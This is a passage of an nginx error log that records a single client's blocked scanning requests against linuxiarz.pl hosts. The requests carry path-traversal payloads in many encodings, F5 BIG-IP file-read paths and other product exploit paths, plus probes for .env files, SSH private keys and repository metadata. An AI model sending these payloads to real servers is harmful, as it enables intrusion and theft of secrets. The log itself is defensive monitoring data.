[error] 3725719#3725719: *342389 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:14:25 [error] 3725719#3725719: *342479 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:17:34 [error] 3725719#3725719: *342753 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:19:30 [error] 3725719#3725719: *342895 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:21:22 [error] 3725719#3725719: *343071 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:21:42 [error] 3725719#3725719: *343089 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:22:58 [error] 3725719#3725719: *343204 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "https://nginx.linuxiarz.pl:443" +2025/06/04 17:27:37 [error] 3725719#3725719: *343489 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:27:40 [error] 3725719#3725719: *343490 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:34:59 [error] 3725719#3725719: *343893 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:40:06 [error] 3725719#3725719: *344228 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:42:04 [error] 3725719#3725719: *344476 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "nginx.linuxiarz.pl:443" +2025/06/04 17:43:13 [error] 3725719#3725719: *344579 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:25 [error] 3725719#3725719: *344631 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:25 [error] 3725719#3725719: *344632 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:27 [error] 3725719#3725719: *344633 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:27 [error] 3725719#3725719: *344634 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:27 [error] 3725719#3725719: *344635 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:27 [error] 3725719#3725719: *344636 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:27 [error] 3725719#3725719: *344637 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:28 [error] 3725719#3725719: *344638 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:28 [error] 3725719#3725719: *344639 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:28 [error] 3725719#3725719: *344640 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:28 [error] 3725719#3725719: *344641 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:28 [error] 3725719#3725719: *344642 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:28 [error] 3725719#3725719: *344643 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:28 [error] 3725719#3725719: *344644 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:28 [error] 3725719#3725719: *344645 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:29 [error] 3725719#3725719: *344646 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:29 [error] 3725719#3725719: *344647 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:29 [error] 3725719#3725719: *344648 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:37 [error] 3725719#3725719: *344661 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.nginx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:38 [error] 3725719#3725719: *344662 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:38 [error] 3725719#3725719: *344664 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:44:38 [error] 3725719#3725719: *344665 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:45:09 [error] 3725719#3725719: *344697 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:45:09 [error] 3725719#3725719: *344698 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_dsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:45:09 [error] 3725719#3725719: *344699 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_1024 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:45:10 [error] 3725719#3725719: *344700 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_2048 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:45:10 [error] 3725719#3725719: *344701 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_3072 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:45:10 [error] 3725719#3725719: *344702 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_4096 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:45:10 [error] 3725719#3725719: *344703 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_ed25519 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:50:01 [error] 3725719#3725719: *345003 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:50:03 [error] 3725719#3725719: *345005 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.config/sftp.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:50:07 [error] 3725719#3725719: *345009 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /js/../.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:50:48 [error] 3725719#3725719: *345046 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:52:29 [error] 3725719#3725719: *345169 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /artemis/1/..;/env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:53:23 [error] 3725719#3725719: *345247 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "nginx.linuxiarz.pl:443" +2025/06/04 17:58:51 [error] 3725719#3725719: *345595 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:58:55 [error] 3725719#3725719: *345604 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:58:58 [error] 3725719#3725719: *345609 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:58:58 [error] 3725719#3725719: *345611 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:58:58 [error] 3725719#3725719: *345612 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:58:58 [error] 3725719#3725719: *345613 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:58:58 [error] 3725719#3725719: *345614 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:58:59 [error] 3725719#3725719: *345616 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:59:00 [error] 3725719#3725719: *345617 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:59:00 [error] 3725719#3725719: *345618 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:59:00 [error] 3725719#3725719: *345619 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:59:00 [error] 3725719#3725719: *345620 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:59:00 [error] 3725719#3725719: *345621 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:59:00 [error] 3725719#3725719: *345622 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:59:01 [error] 3725719#3725719: *345623 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:59:01 [error] 3725719#3725719: *345624 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:59:01 [error] 3725719#3725719: *345625 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:59:12 [error] 3725719#3725719: *345635 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:59:12 [error] 3725719#3725719: *345636 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%5c..%5cetc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:00:19 [error] 3725719#3725719: *345678 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:02:14 [error] 3725719#3725719: *345796 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:02:59 [error] 3725719#3725719: *345871 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:03:13 [error] 3725719#3725719: *345888 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:04:15 [error] 3725719#3725719: *346011 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.drone.yml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:04:29 [error] 3725719#3725719: *346032 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:07:27 [error] 3725719#3725719: *346217 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:07:27 [error] 3725719#3725719: *346218 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:07:29 [error] 3725719#3725719: *346219 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:07:29 [error] 3725719#3725719: *346220 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:07:29 [error] 3725719#3725719: *346221 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:07:30 [error] 3725719#3725719: *346222 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:07:30 [error] 3725719#3725719: *346223 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:07:30 [error] 3725719#3725719: *346224 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:07:30 [error] 3725719#3725719: *346225 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:07:30 [error] 3725719#3725719: *346226 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:07:31 [error] 3725719#3725719: *346227 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:07:31 [error] 3725719#3725719: *346228 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:09:53 [error] 3725719#3725719: *346412 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:09:54 [error] 3725719#3725719: *346414 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:09:54 [error] 3725719#3725719: *346416 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:09:54 [error] 3725719#3725719: *346417 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:09:54 [error] 3725719#3725719: *346418 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:09:54 [error] 3725719#3725719: *346419 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:09:54 [error] 3725719#3725719: *346420 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:09:54 [error] 3725719#3725719: *346421 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:09:54 [error] 3725719#3725719: *346422 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.nginx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:01 [error] 3725719#3725719: *346426 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:01 [error] 3725719#3725719: *346427 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:01 [error] 3725719#3725719: *346428 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:01 [error] 3725719#3725719: *346429 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:01 [error] 3725719#3725719: *346430 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:01 [error] 3725719#3725719: *346431 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:04 [error] 3725719#3725719: *346434 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:04 [error] 3725719#3725719: *346435 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:04 [error] 3725719#3725719: *346436 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:27 [error] 3725719#3725719: *346449 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:27 [error] 3725719#3725719: *346450 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:31 [error] 3725719#3725719: *346453 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:10:34 [error] 3725719#3725719: *346454 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:11:02 [error] 3725719#3725719: *346482 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:11:17 [error] 3725719#3725719: *346490 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:11:17 [error] 3725719#3725719: *346492 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:11:17 [error] 3725719#3725719: *346493 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:11:18 [error] 3725719#3725719: *346494 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:11:18 [error] 3725719#3725719: *346495 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:11:19 [error] 3725719#3725719: *346509 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:12:21 [error] 3725719#3725719: *346560 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ftpconfig HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 18:24:38 [error] 3725719#3725719: *347385 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.example.com HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/05 23:47:56 [error] 3725719#3725719: *459273 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/05 23:47:56 [error] 3725719#3725719: *459274 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn/wc.db HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/05 23:47:56 [error] 3725719#3725719: *459277 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.gh/store/00manifest.i HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:33:54 [error] 3725719#3725719: *470231 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:33:57 [error] 3725719#3725719: *470249 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:34:01 [error] 3725719#3725719: *470278 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:34:22 [error] 3725719#3725719: *470374 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:34:34 [error] 3725719#3725719: *470467 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:34:40 [error] 3725719#3725719: *470494 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:34:42 [error] 3725719#3725719: *470502 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:34:44 [error] 3725719#3725719: *470516 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:34:44 [error] 3725719#3725719: *470520 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:34:47 [error] 3725719#3725719: *470534 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:34:52 [error] 3725719#3725719: *470555 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:34:53 [error] 3725719#3725719: *470565 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/06 02:34:55 